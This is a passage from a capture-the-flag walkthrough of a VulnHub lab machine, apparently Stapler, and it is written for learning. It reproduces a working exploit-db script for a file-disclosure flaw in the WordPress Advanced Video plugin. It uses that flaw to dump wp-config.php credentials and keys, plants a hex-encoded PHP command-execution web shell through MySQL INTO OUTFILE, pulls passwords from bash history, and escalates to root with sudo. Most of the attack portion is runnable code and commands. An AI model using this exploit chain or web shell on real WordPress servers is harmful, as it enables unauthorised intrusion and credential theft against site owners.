 |  Location: https://192.168.1.119:12380/blogblog/wp-content/plugins/two-factor/
 |  Readme: https://192.168.1.119:12380/blogblog/wp-content/plugins/two-factor/readme.txt
[!] Directory listing is enabled: https://192.168.1.119:12380/blogblog/wp-content/plugins/two-factor/

[+] Enumerating all themes (may take a while and use a lot of system resources) ...

   Time: 00:01:04 <=====================> (13139 / 13139) 100.00% Time: 00:01:04

[+] We found 1 themes:

[+] Name: bhost - v1.2.9
 |  Latest version: 1.2.9 (up to date)
 |  Location: https://192.168.1.119:12380/blogblog/wp-content/themes/bhost/
 |  Readme: https://192.168.1.119:12380/blogblog/wp-content/themes/bhost/readme.txt
 |  Style URL: https://192.168.1.119:12380/blogblog/wp-content/themes/bhost/style.css
 |  Theme Name: BHost
 |  Theme URI: Author: Masum Billah
 |  Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This the...
 |  Author: Masum Billah
 |  Author URI: http://getmasum.net/

[+] Finished: Thu Jun 23 05:39:06 2016
[+] Requests Done: 73889
[+] Memory used: 196.32 MB
[+] Elapsed time: 00:05:47

After letting WPScan do a thorough scan, it shows that the WordPress blog is running 4 plugins and 1 theme. It also found a bunch of known vulnerabilities, mostly XSS and an SQL injection vulnerabilities which look promising. Continuing to enumerate, I use searchsploit to see if there is any exploit code available for the WordPress theme and plugins that were found in the previous step. When using searchsploit make sure to try different variations of the search terms to get the best results possible.

searchsploit wordpress advanced video

---------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                      |  Path
                                                                                                    | (/usr/share/exploitdb/platforms)
---------------------------------------------------------------------------------------------------- ----------------------------------
WordPress Advanced Video Plugin 1.0 - Local File Inclusion (LFI)                                    | ./php/webapps/39646.py
---------------------------------------------------------------------------------------------------- ----------------------------------

Looks like there is exploit code available for the “WordPress Advanced Video Plugin 1.0”. Lets take a look at the code to see what it does and how it works.

cat /usr/share/exploitdb/platforms/php/webapps/39646.py

!/usr/bin/env python

# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation
# Google Dork: N/A
# Date: 04/01/2016
# Exploit Author: evait security GmbH
# Vendor Homepage: arshmultani - http://dscom.it/
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/
# Version: 1.0
# Tested on: Linux Apache / Wordpress 4.2.2

#	Timeline
#	03/24/2016 - Bug discovered
#	03/24/2016 - Initial notification of vendor
#	04/01/2016 - No answer from vendor, public release of bug 


# Vulnerable Code (/inc/classes/class.avePost.php) Line 57:

#  function ave_publishPost(){
#    $title = $_REQUEST['title'];
#    $term = $_REQUEST['term'];
#    $thumb = $_REQUEST['thumb'];
# <snip>
# Line 78:
#    $image_data = file_get_contents($thumb);


# POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]

# Exploit - Print the content of wp-config.php in terminal (default Wordpress config)

import random
import urllib2
import re

url = "http://127.0.0.1/wordpress" # insert url to wordpress

randomID = long(random.random() * 100000000000000000L)

objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
content =  objHtml.readlines()
for line in content:
	numbers = re.findall(r'\d+',line)
	id = numbers[-1]
	id = int(id) / 10

objHtml = urllib2.urlopen(url + '/?p=' + str(id))
content = objHtml.readlines()

for line in content:
	if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
		urls=re.findall('"(https?://.*?)"', line)
		print urllib2.urlopen(urls[0]).read()

Looking at this script shows that it will first connect to “https://192.168.1.119:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=123&short=1&term=1&thumb=../wp-config.php” which creates a new blog post with the contents of “wp-config.php” stored inside of an image file contained in the post. It then locates the URL of the image and displays the contents which should be the results of the LFI. Using this script in its provided form will not display the contents of the file so these steps were done manually. After connecting to “https://192.168.1.119:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=123&short=1&term=1&thumb=../wp-config.php” a new blog post is created which contains a link to a image file stored in “https://192.168.1.119:12380/blogblog/wp-content/uploads/”. I downloaded this image and viewed its contents…

cat 1284507121.jpeg

<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'plbkac');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY',  'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY',    'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY',        'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT',        'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT',   '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT',       'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

define('WP_HTTP_BLOCK_EXTERNAL', true);

Jackpot! The results of the LFI attack gave me a MySQL username/password combo that I can hopefully use. I repeated the LFI attack looking to see if I could extract any other valuable information and was presented with a nice MySQL error message which gave me the path to Apaches webroot.

Using the phpMyAdmin page that was discovered earlier, I was able to login using the username “root” and password “plbkac”, which I got from the wp-config.php file. Since I had the full path of the WordPress install, as well as a potentially writeable directory (“/wp-content/uploads/”), it was time to upload a simple php script that will execute shell commands.

cat cmd.php

<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST["cmd"]);
    system($cmd);
    echo "</pre>$cmd<pre>";
    die;
}
?>

Convert the file to a hex string.

echo -n $(cat cmd.php) | xxd -p

3c3f70687020696628697373657428245f524551554553545b27636d6427
5d29297b2024636d64203d2028245f524551554553545b22636d64225d29
3b2073797374656d2824636d64293b206563686f20223c2f7072653e2463
6d643c7072653e223b206469653b207d203f3e

I used the “INTO OUTFILE” method to write the cmd.php file into “/var/www/https/blogblog/wp-content/uploads/cmd.php” which will be accessible at “https://192.168.1.119:12380/blogblog/wp-content/uploads/cmd.php”

SELECT 0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297b2024636d64203d2028245f524551554553545b22636d64225d293b2073797374656d2824636d64293b206563686f20223c2f7072653e24636d643c7072653e223b206469653b207d203f3e INTO OUTFILE '/var/www/https/blogblog/wp-content/uploads/cmd.php'

Now that I have a limited access shell, it’s time to start the post exploitation enumeration phase. I always start out by downloading my modified version of the “Local Linux Enumeration & Privilege Escalation Script(LinEnum.sh)” using either wget or curl typically. This script will collect history & configuration files, file & folder permissions, network settings and a ton of other potentially valuable info. After the script finishes, I transfer the results back to my machine so I can look through everything that was collected. The first place I start looking for valuable info is inside of the “.bash_history” files which contain previous commands that the user has executed. Looking inside “/home/JKanode/.bash_history” I found 2 username/password combos for localhost.

cat JKanode/.bash_history

cat .bash_history
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit

Next, I SSH’d into the “peter” account using the password “JZQuyIN5” and checked the user privileges.

id

uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)

Looks like the current user is in the sudo group. Time to spawn a new bash shell using the sudo command.

sudo /bin/bash

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter: 
root@red:~# id
uid=0(root) gid=0(root) groups=0(root)

Looks like its game over, now time to get the flag!

Thanks to g0tmi1k and the rest of the VulnHub Team for putting together and hosting another great challenge.